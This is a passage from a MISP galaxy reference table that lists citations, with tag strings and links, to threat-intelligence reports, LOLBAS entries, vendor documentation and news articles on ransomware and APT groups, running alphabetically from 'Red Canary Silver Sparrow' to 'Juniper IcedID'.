
The tag is: misp-galaxy:references="Red Canary Silver Sparrow Feb2021"

Table 13052. Table References

Links

https://redcanary.com/blog/clipping-silver-sparrows-wings/

CL_LoadAssembly.ps1 - LOLBAS Project

LOLBAS. (2021, September 26). CL_LoadAssembly.ps1. Retrieved December 4, 2023.

The tag is: misp-galaxy:references="CL_LoadAssembly.ps1 - LOLBAS Project"

Table 13053. Table References

Links

https://lolbas-project.github.io/lolbas/Scripts/CL_LoadAssembly/

CL_Mutexverifiers.ps1 - LOLBAS Project

LOLBAS. (2018, May 25). CL_Mutexverifiers.ps1. Retrieved December 4, 2023.

The tag is: misp-galaxy:references="CL_Mutexverifiers.ps1 - LOLBAS Project"

Table 13054. Table References

Links

https://lolbas-project.github.io/lolbas/Scripts/CL_mutexverifiers/

Cybereason Clop Dec 2020

Cybereason Nocturnus. (2020, December 23). Cybereason vs. Clop Ransomware. Retrieved May 11, 2021.

The tag is: misp-galaxy:references="Cybereason Clop Dec 2020"

Table 13055. Table References

Links

https://www.cybereason.com/blog/cybereason-vs.-clop-ransomware

Mcafee Clop Aug 2019

Mundo, A. (2019, August 1). Clop Ransomware. Retrieved May 10, 2021.

The tag is: misp-galaxy:references="Mcafee Clop Aug 2019"

Table 13056. Table References

Links

https://www.mcafee.com/blogs/other-blogs/mcafee-labs/clop-ransomware/

Kaspersky Cloud Atlas December 2014

GReAT. (2014, December 10). Cloud Atlas: RedOctober APT is back in style. Retrieved May 8, 2020.

The tag is: misp-galaxy:references="Kaspersky Cloud Atlas December 2014"

Table 13057. Table References

Links

https://securelist.com/cloud-atlas-redoctober-apt-is-back-in-style/68083/

Rhino Labs Cloud Backdoor September 2019

Rhino Labs. (2019, September). Cloud Container Attack Tool (CCAT). Retrieved September 12, 2019.

The tag is: misp-galaxy:references="Rhino Labs Cloud Backdoor September 2019"

Table 13058. Table References

Links

https://github.com/RhinoSecurityLabs/ccat

Google Cloud Storage

Google. (n.d.). Cloud Storage. Retrieved October 13, 2021.

The tag is: misp-galaxy:references="Google Cloud Storage"

Table 13059. Table References

Links

https://cloud.google.com/storage

Office 265 Azure Domain Availability

Microsoft. (2017, January 23). (Cloud) Tip of the Day: Advanced way to check domain availability for Office 365 and Azure. Retrieved May 27, 2022.

The tag is: misp-galaxy:references="Office 265 Azure Domain Availability"

Table 13060. Table References

Links

https://docs.microsoft.com/en-us/archive/blogs/tip_of_the_day/cloud-tip-of-the-day-advanced-way-to-check-domain-availability-for-office-365-and-azure

Mandiant Cloudy Logs 2023

Pany, D. & Hanley, C. (2023, May 3). Cloudy with a Chance of Bad Logs: Cloud Platform Log Configurations to Consider in Investigations. Retrieved October 16, 2023.

The tag is: misp-galaxy:references="Mandiant Cloudy Logs 2023"

Table 13061. Table References

Links

https://www.mandiant.com/resources/blog/cloud-bad-log-configurations

win_clsid_key

Microsoft. (2018, May 31). CLSID Key. Retrieved September 24, 2021.

The tag is: misp-galaxy:references="win_clsid_key"

Table 13062. Table References

Links

https://docs.microsoft.com/en-us/windows/win32/com/clsid-key-hklm

Kube Cluster Admin

kubernetes. (2021, January 16). Cluster Administration. Retrieved October 13, 2021.

The tag is: misp-galaxy:references="Kube Cluster Admin"

Table 13063. Table References

Links

https://kubernetes.io/docs/concepts/cluster-administration/

Kube Cluster Info

kubernetes. (n.d.). cluster-info. Retrieved October 13, 2021.

The tag is: misp-galaxy:references="Kube Cluster Info"

Table 13064. Table References

Links

https://kubernetes.io/docs/reference/generated/kubectl/kubectl-commands#cluster-info

TechNet Cmd

Microsoft. (n.d.). Cmd. Retrieved April 18, 2016.

The tag is: misp-galaxy:references="TechNet Cmd"

Table 13065. Table References

Links

https://technet.microsoft.com/en-us/library/bb490880.aspx

Cmd.exe - LOLBAS Project

LOLBAS. (2019, June 26). Cmd.exe. Retrieved December 4, 2023.

The tag is: misp-galaxy:references="Cmd.exe - LOLBAS Project"

Table 13066. Table References

Links

https://lolbas-project.github.io/lolbas/Binaries/Cmd/

Cmdkey.exe - LOLBAS Project

LOLBAS. (2018, May 25). Cmdkey.exe. Retrieved December 4, 2023.

The tag is: misp-galaxy:references="Cmdkey.exe - LOLBAS Project"

Table 13067. Table References

Links

https://lolbas-project.github.io/lolbas/Binaries/Cmdkey/

cmdl32.exe - LOLBAS Project

LOLBAS. (2021, August 26). cmdl32.exe. Retrieved December 4, 2023.

The tag is: misp-galaxy:references="cmdl32.exe - LOLBAS Project"

Table 13068. Table References

Links

https://lolbas-project.github.io/lolbas/Binaries/Cmdl32/

Cmstp.exe - LOLBAS Project

LOLBAS. (2018, May 25). Cmstp.exe. Retrieved December 4, 2023.

The tag is: misp-galaxy:references="Cmstp.exe - LOLBAS Project"

Table 13069. Table References

Links

https://lolbas-project.github.io/lolbas/Binaries/Cmstp/

Twitter CMSTP Jan 2018

Tyrer, N. (2018, January 30). CMSTP.exe - remote .sct execution applocker bypass. Retrieved April 11, 2018.

The tag is: misp-galaxy:references="Twitter CMSTP Jan 2018"

Table 13070. Table References

Links

https://twitter.com/NickTyrer/status/958450014111633408

Secureworks COBALT DICKENS September 2019

Counter Threat Unit Research Team. (2019, September 11). COBALT DICKENS Goes Back to School…Again. Retrieved February 3, 2021.

The tag is: misp-galaxy:references="Secureworks COBALT DICKENS September 2019"

Table 13071. Table References

Links

https://www.secureworks.com/blog/cobalt-dickens-goes-back-to-school-again

Morphisec Cobalt Gang Oct 2018

Gorelik, M. (2018, October 08). Cobalt Group 2.0. Retrieved November 5, 2018.

The tag is: misp-galaxy:references="Morphisec Cobalt Gang Oct 2018"

Table 13072. Table References

Links

https://blog.morphisec.com/cobalt-gang-2.0

Secureworks COBALT GYPSY Threat Profile

Secureworks. (n.d.). COBALT GYPSY Threat Profile. Retrieved April 14, 2021.

The tag is: misp-galaxy:references="Secureworks COBALT GYPSY Threat Profile"

Table 13073. Table References

Links

https://www.secureworks.com/research/threat-profiles/cobalt-gypsy

Secureworks COBALT ILLUSION Threat Profile

Secureworks. (n.d.). COBALT ILLUSION Threat Profile. Retrieved April 14, 2021.

The tag is: misp-galaxy:references="Secureworks COBALT ILLUSION Threat Profile"

Table 13074. Table References

Links

https://www.secureworks.com/research/threat-profiles/cobalt-illusion

PTSecurity Cobalt Dec 2016

Positive Technologies. (2016, December 16). Cobalt Snatch. Retrieved October 9, 2018.

The tag is: misp-galaxy:references="PTSecurity Cobalt Dec 2016"

Table 13075. Table References

Links

https://www.ptsecurity.com/upload/corporate/ww-en/analytics/Cobalt-Snatch-eng.pdf

CobaltStrike Daddy May 2017

Mudge, R. (2017, May 23). Cobalt Strike 3.8 – Who’s Your Daddy?. Retrieved June 4, 2019.

The tag is: misp-galaxy:references="CobaltStrike Daddy May 2017"

Table 13076. Table References

Links

https://blog.cobaltstrike.com/2017/05/23/cobalt-strike-3-8-whos-your-daddy/

Cobalt Strike Manual 4.3 November 2020

Strategic Cyber LLC. (2020, November 5). Cobalt Strike: Advanced Threat Tactics for Penetration Testers. Retrieved April 13, 2021.

The tag is: misp-galaxy:references="Cobalt Strike Manual 4.3 November 2020"

Table 13077. Table References

Links

https://web.archive.org/web/20210708035426/https://www.cobaltstrike.com/downloads/csmanual43.pdf

cobaltstrike manual

Strategic Cyber LLC. (2017, March 14). Cobalt Strike Manual. Retrieved May 24, 2017.

The tag is: misp-galaxy:references="cobaltstrike manual"

Table 13078. Table References

Links

https://web.archive.org/web/20210825130434/https://cobaltstrike.com/downloads/csmanual38.pdf

TrendMicro Cobalt Group Nov 2017

Giagone, R., Bermejo, L., and Yarochkin, F. (2017, November 20). Cobalt Strikes Again: Spam Runs Use Macros and CVE-2017-8759 Exploit Against Russian Banks. Retrieved March 7, 2019.

The tag is: misp-galaxy:references="TrendMicro Cobalt Group Nov 2017"

Table 13079. Table References

Links

https://blog.trendmicro.com/trendlabs-security-intelligence/cobalt-spam-runs-use-macros-cve-2017-8759-exploit/

PTSecurity Cobalt Group Aug 2017

Positive Technologies. (2017, August 16). Cobalt Strikes Back: An Evolving Multinational Threat to Finance. Retrieved September 5, 2018.

The tag is: misp-galaxy:references="PTSecurity Cobalt Group Aug 2017"

Table 13080. Table References

Links

https://www.ptsecurity.com/upload/corporate/ww-en/analytics/Cobalt-2017-eng.pdf

Zscaler Cobian Aug 2017

Yadav, A., et al. (2017, August 31). Cobian RAT – A backdoored RAT. Retrieved November 13, 2018.

The tag is: misp-galaxy:references="Zscaler Cobian Aug 2017"

Table 13081. Table References

Links

https://www.zscaler.com/blogs/research/cobian-rat-backdoored-rat

MACOS Cocoa

Apple. (2015, September 16). Cocoa Application Layer. Retrieved June 25, 2020.

The tag is: misp-galaxy:references="MACOS Cocoa"

Table 13082. Table References

Links

https://developer.apple.com/library/archive/documentation/MacOSX/Conceptual/OSX_Technology_Overview/CocoaApplicationLayer/CocoaApplicationLayer.html#//apple_ref/doc/uid/TP40001067-CH274-SW1

code.exe - LOLBAS Project

LOLBAS. (2023, February 1). code.exe. Retrieved December 4, 2023.

The tag is: misp-galaxy:references="code.exe - LOLBAS Project"

Table 13083. Table References

Links

https://lolbas-project.github.io/lolbas/HonorableMentions/Code/

Dark Reading Code Spaces Cyber Attack

Brian Prince. (2014, June 20). Code Hosting Service Shuts Down After Cyber Attack. Retrieved March 21, 2023.

The tag is: misp-galaxy:references="Dark Reading Code Spaces Cyber Attack"

Table 13084. Table References

Links

https://www.darkreading.com/attacks-breaches/code-hosting-service-shuts-down-after-cyber-attack

Medium Ptrace JUL 2018

Jain, S. (2018, July 25). Code injection in running process using ptrace. Retrieved February 21, 2020.

The tag is: misp-galaxy:references="Medium Ptrace JUL 2018"

Table 13085. Table References

Links

https://medium.com/@jain.sm/code-injection-in-running-process-using-ptrace-d3ea7191a4be

Wikipedia Code Signing

Wikipedia. (2015, November 10). Code Signing. Retrieved March 31, 2016.

The tag is: misp-galaxy:references="Wikipedia Code Signing"

Table 13086. Table References

Links

https://en.wikipedia.org/wiki/Code_signing

SpectorOps Code Signing Dec 2017

Graeber, M. (2017, December 22). Code Signing Certificate Cloning Attacks and Defenses. Retrieved April 3, 2018.

The tag is: misp-galaxy:references="SpectorOps Code Signing Dec 2017"

Table 13087. Table References

Links

https://posts.specterops.io/code-signing-certificate-cloning-attacks-and-defenses-6f98657fc6ec

CoinLoader: A Sophisticated Malware Loader Campaign

Avira. (2019, November 28). CoinLoader: A Sophisticated Malware Loader Campaign. Retrieved June 5, 2023.

The tag is: misp-galaxy:references="CoinLoader: A Sophisticated Malware Loader Campaign"

Table 13088. Table References

Links

https://www.avira.com/en/blog/coinloader-a-sophisticated-malware-loader-campaign

NYT-Colonial

Nicole Perlroth. (2021, May 13). Colonial Pipeline paid 75 Bitcoin, or roughly $5 million, to hackers. Retrieved August 18, 2023.

The tag is: misp-galaxy:references="NYT-Colonial"

Table 13089. Table References

Links

https://www.nytimes.com/2021/05/13/technology/colonial-pipeline-ransom.html

Colorcpl.exe - LOLBAS Project

LOLBAS. (2023, June 26). Colorcpl.exe. Retrieved December 4, 2023.

The tag is: misp-galaxy:references="Colorcpl.exe - LOLBAS Project"

Table 13090. Table References

Links

https://lolbas-project.github.io/lolbas/Binaries/Colorcpl/

sentinelone shlayer to zshlayer

Phil Stokes. (2020, September 8). Coming Out of Your Shell: From Shlayer to ZShlayer. Retrieved September 13, 2021.

The tag is: misp-galaxy:references="sentinelone shlayer to zshlayer"

Table 13091. Table References

Links

https://www.sentinelone.com/blog/coming-out-of-your-shell-from-shlayer-to-zshlayer/

University of Birmingham C2

Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.

The tag is: misp-galaxy:references="University of Birmingham C2"

Table 13092. Table References

Links

https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf

Microsoft Command-line Logging

Mathers, B. (2017, March 7). Command line process auditing. Retrieved April 21, 2017.

The tag is: misp-galaxy:references="Microsoft Command-line Logging"

Table 13093. Table References

Links

https://technet.microsoft.com/en-us/windows-server-docs/identity/ad-ds/manage/component-updates/command-line-process-auditing

Microsoft Netdom Trust Sept 2012

Microsoft. (2012, September 11). Command-Line Reference - Netdom Trust. Retrieved November 30, 2017.

The tag is: misp-galaxy:references="Microsoft Netdom Trust Sept 2012"

Table 13094. Table References

Links

https://technet.microsoft.com/library/cc835085.aspx

Microsoft msxsl.exe

Microsoft. (n.d.). Command Line Transformation Utility (msxsl.exe). Retrieved July 3, 2018.

The tag is: misp-galaxy:references="Microsoft msxsl.exe"

Table 13095. Table References

Links

https://www.microsoft.com/download/details.aspx?id=21714

Kettle CSV DDE Aug 2014

Kettle, J. (2014, August 29). Comma Separated Vulnerabilities. Retrieved November 22, 2017.

The tag is: misp-galaxy:references="Kettle CSV DDE Aug 2014"

Table 13096. Table References

Links

https://www.contextis.com/blog/comma-separated-vulnerabilities

Microsoft CLR Integration 2017

Microsoft. (2017, June 19). Common Language Runtime Integration. Retrieved July 8, 2019.

The tag is: misp-galaxy:references="Microsoft CLR Integration 2017"

Table 13097. Table References

Links

https://docs.microsoft.com/en-us/sql/relational-databases/clr-integration/common-language-runtime-integration-overview?view=sql-server-2017

Palo Alto Comnie

Grunzweig, J. (2018, January 31). Comnie Continues to Target Organizations in East Asia. Retrieved June 7, 2018.

The tag is: misp-galaxy:references="Palo Alto Comnie"

Table 13098. Table References

Links

https://researchcenter.paloaltonetworks.com/2018/01/unit42-comnie-continues-target-organizations-east-asia/

GDATA COM Hijacking

G DATA. (2014, October). COM Object hijacking: the discreet way of persistence. Retrieved August 13, 2016.

The tag is: misp-galaxy:references="GDATA COM Hijacking"

Table 13099. Table References

Links

https://blog.gdatasoftware.com/2014/10/23941-com-object-hijacking-the-discreet-way-of-persistence

AP-NotPetya

Frank Bajak and Raphael Satter. (2017, June 30). Companies still hobbled from fearsome cyberattack. Retrieved August 18, 2023.

The tag is: misp-galaxy:references="AP-NotPetya"

Table 13100. Table References

Links

https://apnews.com/article/russia-ukraine-technology-business-europe-hacking-ce7a8aca506742ab8e8873e7f9f229c2

Microsoft COM

Microsoft. (n.d.). Component Object Model (COM). Retrieved November 22, 2017.

The tag is: misp-galaxy:references="Microsoft COM"

Table 13101. Table References

Links

https://msdn.microsoft.com/library/windows/desktop/ms680573.aspx

Palo Alto Unit 42 Compromised Cloud Compute Credentials 2022

Dror Alon. (2022, December 8). Compromised Cloud Compute Credentials: Case Studies From the Wild. Retrieved March 9, 2023.

The tag is: misp-galaxy:references="Palo Alto Unit 42 Compromised Cloud Compute Credentials 2022"

Table 13102. Table References

Links

https://unit42.paloaltonetworks.com/compromised-cloud-compute-credentials/

US-CERT Alert TA15-314A Web Shells

US-CERT. (2015, November 13). Compromised Web Servers and Web Shells - Threat Awareness and Guidance. Retrieved June 8, 2016.

The tag is: misp-galaxy:references="US-CERT Alert TA15-314A Web Shells"

Table 13103. Table References

Links

https://www.us-cert.gov/ncas/alerts/TA15-314A

Comsvcs.dll - LOLBAS Project

LOLBAS. (2019, August 30). Comsvcs.dll. Retrieved December 4, 2023.

The tag is: misp-galaxy:references="Comsvcs.dll - LOLBAS Project"

Table 13104. Table References

Links

https://lolbas-project.github.io/lolbas/Libraries/comsvcs/

Condi-Botnet-binaries

Joie Salvio and Roy Tay. (2023, June 20). Condi DDoS Botnet Spreads via TP-Link’s CVE-2023-1389. Retrieved September 5, 2023.

The tag is: misp-galaxy:references="Condi-Botnet-binaries"

Table 13105. Table References

Links

https://www.fortinet.com/blog/threat-research/condi-ddos-botnet-spreads-via-tp-links-cve-2023-1389

Microsoft Common Conditional Access Policies

Microsoft. (2022, December 14). Conditional Access templates. Retrieved February 21, 2023.

The tag is: misp-galaxy:references="Microsoft Common Conditional Access Policies"

Table 13106. Table References

Links

https://learn.microsoft.com/en-us/azure/active-directory/conditional-access/concept-conditional-access-policy-common

Trend Micro Conficker

Trend Micro. (2014, March 18). Conficker. Retrieved February 18, 2021.

The tag is: misp-galaxy:references="Trend Micro Conficker"

Table 13107. Table References

Links

https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/conficker

ConfigSecurityPolicy.exe - LOLBAS Project

LOLBAS. (2020, September 4). ConfigSecurityPolicy.exe. Retrieved December 4, 2023.

The tag is: misp-galaxy:references="ConfigSecurityPolicy.exe - LOLBAS Project"

Table 13108. Table References

Links

https://lolbas-project.github.io/lolbas/Binaries/ConfigSecurityPolicy/

Microsoft SAML Token Lifetimes

Microsoft. (2020, December 14). Configurable token lifetimes in Microsoft Identity Platform. Retrieved December 22, 2020.

The tag is: misp-galaxy:references="Microsoft SAML Token Lifetimes"

Table 13109. Table References

Links

https://docs.microsoft.com/en-us/azure/active-directory/develop/active-directory-configurable-token-lifetimes

Apple Developer Configuration Profile

Apple. (2019, May 3). Configuration Profile Reference. Retrieved September 23, 2021.

The tag is: misp-galaxy:references="Apple Developer Configuration Profile"

Table 13110. Table References

Links

https://developer.apple.com/business/documentation/Configuration-Profile-Reference.pdf

MDMProfileConfigMacOS

Apple. (2019, May 3). Configuration Profile Reference, Developer. Retrieved April 15, 2022.

The tag is: misp-galaxy:references="MDMProfileConfigMacOS"

Table 13111. Table References

Links

https://developer.apple.com/business/documentation/Configuration-Profile-Reference.pdf

Azure Just in Time Access 2023

Microsoft. (2023, August 29). Configure and approve just-in-time access for Azure Managed Applications. Retrieved September 21, 2023.

The tag is: misp-galaxy:references="Azure Just in Time Access 2023"

Table 13112. Table References

Links

https://learn.microsoft.com/en-us/azure/azure-resource-manager/managed-applications/approve-just-in-time-access

capture_embedded_packet_on_software

Cisco. (2022, August 17). Configure and Capture Embedded Packet on Software. Retrieved July 13, 2022.

The tag is: misp-galaxy:references="capture_embedded_packet_on_software"

Table 13113. Table References

Links

https://www.cisco.com/c/en/us/support/docs/ios-nx-os-software/ios-embedded-packet-capture/116045-productconfig-epc-00.html

Kubernetes Security Context

Kubernetes. (n.d.). Configure a Security Context for a Pod or Container. Retrieved March 8, 2023.

The tag is: misp-galaxy:references="Kubernetes Security Context"

Table 13114. Table References

Links

https://kubernetes.io/docs/tasks/configure-pod-container/security-context/

Microsoft SharePoint Logging

Microsoft. (2017, July 19). Configure audit settings for a site collection. Retrieved April 4, 2018.

The tag is: misp-galaxy:references="Microsoft SharePoint Logging"

Table 13115. Table References

Links

https://support.office.com/en-us/article/configure-audit-settings-for-a-site-collection-a9920c97-38c0-44f2-8bcb-4cf1e2ae22d2

TechNet RDP NLA

Microsoft. (n.d.). Configure Network Level Authentication for Remote Desktop Services Connections. Retrieved June 6, 2016.

The tag is: misp-galaxy:references="TechNet RDP NLA"

Table 13116. Table References

Links

https://technet.microsoft.com/en-us/library/cc732713.aspx

Microsoft Security Alerts for Azure AD Roles

Microsoft. (2022, November 14). Configure security alerts for Azure AD roles in Privileged Identity Management. Retrieved February 21, 2023.

The tag is: misp-galaxy:references="Microsoft Security Alerts for Azure AD Roles"

Table 13117. Table References

Links

https://learn.microsoft.com/en-us/security/benchmark/azure/baselines/aad-security-baseline

Kubernetes Service Accounts

Kubernetes. (2022, February 26). Configure Service Accounts for Pods. Retrieved April 1, 2022.

The tag is: misp-galaxy:references="Kubernetes Service Accounts"

Table 13118. Table References

Links

https://kubernetes.io/docs/tasks/configure-pod-container/configure-service-account/

Windows RDP Sessions

Microsoft. (n.d.). Configure Timeout and Reconnection Settings for Remote Desktop Services Sessions. Retrieved December 11, 2017.

The tag is: misp-galaxy:references="Windows RDP Sessions"

Table 13119. Table References

Links

https://technet.microsoft.com/en-us/library/cc754272(v=ws.11).aspx

Microsoft Configure LSA

Microsoft. (2013, July 31). Configuring Additional LSA Protection. Retrieved June 24, 2015.

The tag is: misp-galaxy:references="Microsoft Configure LSA"

Table 13120. Table References

Links

https://technet.microsoft.com/en-us/library/dn408187.aspx

Microsoft LSA Protection Mar 2014

Microsoft. (2014, March 12). Configuring Additional LSA Protection. Retrieved November 27, 2017.

The tag is: misp-galaxy:references="Microsoft LSA Protection Mar 2014"

Table 13121. Table References

Links

https://technet.microsoft.com/library/dn408187.aspx

Microsoft LSA

Microsoft. (2013, July 31). Configuring Additional LSA Protection. Retrieved February 13, 2015.

The tag is: misp-galaxy:references="Microsoft LSA"

Table 13122. Table References

Links

https://technet.microsoft.com/en-us/library/dn408187.aspx

Configuring Data Access audit logs

Google. (n.d.). Configuring Data Access audit logs. Retrieved October 16, 2020.

The tag is: misp-galaxy:references="Configuring Data Access audit logs"

Table 13123. Table References

Links

https://cloud.google.com/logging/docs/audit/configure-data-access

Microsoft SID Filtering Quarantining Jan 2009

Microsoft. (n.d.). Configuring SID Filter Quarantining on External Trusts. Retrieved November 30, 2017.

The tag is: misp-galaxy:references="Microsoft SID Filtering Quarantining Jan 2009"

Table 13124. Table References

Links

https://technet.microsoft.com/library/cc794757.aspx

TechRepublic Wireless GPO FEB 2009

Schauland, D. (2009, February 24). Configuring Wireless settings via Group Policy. Retrieved July 26, 2018.

The tag is: misp-galaxy:references="TechRepublic Wireless GPO FEB 2009"

Table 13125. Table References

Links

https://www.techrepublic.com/blog/data-center/configuring-wireless-settings-via-group-policy/

ZDNet Dtrack

Catalin Cimpanu. (2019, October 30). Confirmed: North Korean malware found on Indian nuclear plant’s network. Retrieved January 20, 2021.

The tag is: misp-galaxy:references="ZDNet Dtrack"

Table 13126. Table References

Links

https://www.zdnet.com/article/confirmed-north-korean-malware-found-on-indian-nuclear-plants-network/

Uptycs Confucius APT Jan 2021

Uptycs Threat Research Team. (2021, January 12). Confucius APT deploys Warzone RAT. Retrieved December 17, 2021.

The tag is: misp-galaxy:references="Uptycs Confucius APT Jan 2021"

Table 13127. Table References

Links

https://www.uptycs.com/blog/confucius-apt-deploys-warzone-rat

TrendMicro Confucius APT Aug 2021

Lunghi, D. (2021, August 17). Confucius Uses Pegasus Spyware-related Lures to Target Pakistani Military. Retrieved December 26, 2021.

The tag is: misp-galaxy:references="TrendMicro Confucius APT Aug 2021"

Table 13128. Table References

Links

https://www.trendmicro.com/en_us/research/21/h/confucius-uses-pegasus-spyware-related-lures-to-target-pakistani.html

Conhost.exe - LOLBAS Project

LOLBAS. (2022, April 5). Conhost.exe. Retrieved December 4, 2023.

The tag is: misp-galaxy:references="Conhost.exe - LOLBAS Project"

Table 13129. Table References

Links

https://lolbas-project.github.io/lolbas/Binaries/Conhost/

EC2 Instance Connect

AWS. (2023, June 2). Connect using EC2 Instance Connect. Retrieved June 2, 2023.

The tag is: misp-galaxy:references="EC2 Instance Connect"

Table 13130. Table References

Links

https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-connect-methods.html

Docker Docs Container

docker docs. (n.d.). Containers. Retrieved October 13, 2021.

The tag is: misp-galaxy:references="Docker Docs Container"

Table 13131. Table References

Links

https://docs.docker.com/engine/api/v1.41/#tag/Container

DigitalShadows CDN

Swisscom & Digital Shadows. (2017, September 6). Content Delivery Networks (CDNs) Can Leave You Exposed – How You Might Be Affected And What You Can Do About It. Retrieved October 20, 2020.

The tag is: misp-galaxy:references="DigitalShadows CDN"

Table 13132. Table References

Links

https://www.digitalshadows.com/blog-and-research/content-delivery-networks-cdns-can-leave-you-exposed-how-you-might-be-affected-and-what-you-can-do-about-it/

Content trust in Azure Container Registry

Microsoft. (2019, September 5). Content trust in Azure Container Registry. Retrieved October 16, 2019.

The tag is: misp-galaxy:references="Content trust in Azure Container Registry"

Table 13133. Table References

Links

https://docs.microsoft.com/en-us/azure/container-registry/container-registry-content-trust

Content trust in Docker

Docker. (2019, October 10). Content trust in Docker. Retrieved October 16, 2019.

The tag is: misp-galaxy:references="Content trust in Docker"

Table 13134. Table References

Links

https://docs.docker.com/engine/security/trust/content_trust/

DFIR Conti Bazar Nov 2021

DFIR Report. (2021, November 29). CONTInuing the Bazar Ransomware Story. Retrieved September 29, 2022.

The tag is: misp-galaxy:references="DFIR Conti Bazar Nov 2021"

Table 13135. Table References

Links

https://thedfirreport.com/2021/11/29/continuing-the-bazar-ransomware-story/

Cybereason Conti Jan 2021

Rochberger, L. (2021, January 12). Cybereason vs. Conti Ransomware. Retrieved February 17, 2021.

The tag is: misp-galaxy:references="Cybereason Conti Jan 2021"

Table 13136. Table References

Links

https://www.cybereason.com/blog/cybereason-vs.-conti-ransomware

Cybleinc Conti January 2020

Cybleinc. (2021, January 21). Conti Ransomware Resurfaces, Targeting Government & Large Organizations. Retrieved April 13, 2021.

The tag is: misp-galaxy:references="Cybleinc Conti January 2020"

Table 13137. Table References

Links

https://cybleinc.com/2021/01/21/conti-ransomware-resurfaces-targeting-government-large-organizations/

Control.exe - LOLBAS Project

LOLBAS. (2018, May 25). Control.exe. Retrieved December 4, 2023.

The tag is: misp-galaxy:references="Control.exe - LOLBAS Project"

Table 13138. Table References

Links

https://lolbas-project.github.io/lolbas/Binaries/Control/

Wikipedia Control Flow Integrity

Wikipedia. (2018, January 11). Control-flow integrity. Retrieved March 12, 2018.

The tag is: misp-galaxy:references="Wikipedia Control Flow Integrity"

Table 13139. Table References

Links

https://en.wikipedia.org/wiki/Control-flow_integrity

Kubernetes API Control Access

The Kubernetes Authors. (n.d.). Controlling Access to The Kubernetes API. Retrieved March 29, 2021.

The tag is: misp-galaxy:references="Kubernetes API Control Access"

Table 13140. Table References

Links

https://kubernetes.io/docs/concepts/security/controlling-access/

TrendMicro CPL Malware Dec 2013

Bernardino, J. (2013, December 17). Control Panel Files Used As Malicious Attachments. Retrieved January 18, 2018.

The tag is: misp-galaxy:references="TrendMicro CPL Malware Dec 2013"

Table 13141. Table References

Links

https://blog.trendmicro.com/trendlabs-security-intelligence/control-panel-files-used-as-malicious-attachments/

GitHub Conveigh

Robertson, K. (2016, August 28). Conveigh. Retrieved November 17, 2017.

The tag is: misp-galaxy:references="GitHub Conveigh"

Table 13142. Table References

Links

https://github.com/Kevin-Robertson/Conveigh

MITRE Copernicus

Butterworth, J. (2013, July 30). Copernicus: Question Your Assumptions about BIOS Security. Retrieved December 11, 2015.

The tag is: misp-galaxy:references="MITRE Copernicus"

Table 13143. Table References

Links

http://www.mitre.org/capabilities/cybersecurity/overview/cybersecurity-blog/copernicus-question-your-assumptions-about

Secureworks COPPER FIELDSTONE Profile

Secureworks. (n.d.). COPPER FIELDSTONE. Retrieved October 6, 2021.

The tag is: misp-galaxy:references="Secureworks COPPER FIELDSTONE Profile"

Table 13144. Table References

Links

https://www.secureworks.com/research/threat-profiles/copper-fieldstone

TechNet Copy

Microsoft. (n.d.). Copy. Retrieved April 26, 2016.

The tag is: misp-galaxy:references="TechNet Copy"

Table 13145. Table References

Links

https://technet.microsoft.com/en-us/library/bb490886.aspx

copy_cmd_cisco

Cisco. (2022, August 16). copy - Cisco IOS Configuration Fundamentals Command Reference. Retrieved July 13, 2022.

The tag is: misp-galaxy:references="copy_cmd_cisco"

Table 13146. Table References

Links

https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/fundamentals/command/cf_command_ref/C_commands.html#wp1068167689

CopyKittens Nov 2015

Minerva Labs LTD and ClearSky Cyber Security. (2015, November 23). CopyKittens Attack Group. Retrieved September 11, 2017.

The tag is: misp-galaxy:references="CopyKittens Nov 2015"

Table 13147. Table References

Links

https://s3-eu-west-1.amazonaws.com/minervaresearchpublic/CopyKittens/CopyKittens.pdf

coregen.exe - LOLBAS Project

LOLBAS. (2020, October 9). coregen.exe. Retrieved December 4, 2023.

The tag is: misp-galaxy:references="coregen.exe - LOLBAS Project"

Table 13148. Table References

Links

https://lolbas-project.github.io/lolbas/OtherMSBinaries/Coregen/

Apple Core Services

Apple. (n.d.). Core Services. Retrieved June 25, 2020.

The tag is: misp-galaxy:references="Apple Core Services"

Table 13149. Table References

Links

https://developer.apple.com/documentation/coreservices

Microsoft STRONTIUM Aug 2019

MSRC Team. (2019, August 5). Corporate IoT – a path to intrusion. Retrieved August 16, 2019.

The tag is: misp-galaxy:references="Microsoft STRONTIUM Aug 2019"

Table 13150. Table References

Links

https://msrc-blog.microsoft.com/2019/08/05/corporate-iot-a-path-to-intrusion/

Palo Alto ARP

Palo Alto Networks. (2021, November 24). Cortex XDR Analytics Alert Reference: Uncommon ARP cache listing via arp.exe. Retrieved December 7, 2021.

The tag is: misp-galaxy:references="Palo Alto ARP"

Table 13151. Table References

Links

https://docs.paloaltonetworks.com/cortex/cortex-xdr/cortex-xdr-analytics-alert-reference/cortex-xdr-analytics-alert-reference/uncommon-arp-cache-listing-via-arp-exe.html

F-Secure Cosmicduke

F-Secure Labs. (2014, July). COSMICDUKE Cosmu with a twist of MiniDuke. Retrieved July 3, 2014.

The tag is: misp-galaxy:references="F-Secure Cosmicduke"

Table 13152. Table References

Links

https://blog.f-secure.com/wp-content/uploads/2019/10/CosmicDuke.pdf

Costin Raiu IAmTheKing October 2020

Costin Raiu. (2020, October 2). Costin Raiu Twitter IAmTheKing SlothfulMedia. Retrieved November 16, 2020.

The tag is: misp-galaxy:references="Costin Raiu IAmTheKing October 2020"

Table 13153. Table References

Links

https://twitter.com/craiu/status/1311920398259367942

Google Iran Threats October 2021

Bash, A. (2021, October 14). Countering threats from Iran. Retrieved January 4, 2023.

The tag is: misp-galaxy:references="Google Iran Threats October 2021"

Table 13154. Table References

Links

https://blog.google/threat-analysis-group/countering-threats-iran/

Cisco DNSMessenger March 2017

Brumaghin, E. and Grady, C. (2017, March 2). Covert Channels and Poor Decisions: The Tale of DNSMessenger. Retrieved March 8, 2017.

The tag is: misp-galaxy:references="Cisco DNSMessenger March 2017"

Table 13155. Table References

Links

http://blog.talosintelligence.com/2017/03/dnsmessenger.html

Juniper IcedID June 2020

Kimayong, P. (2020, June 18). COVID-19 and FMLA Campaigns used to install new IcedID banking malware. Retrieved July 14, 2020.

The tag is: misp-galaxy:references="Juniper IcedID June 2020"

Table 13156. Table References

Links

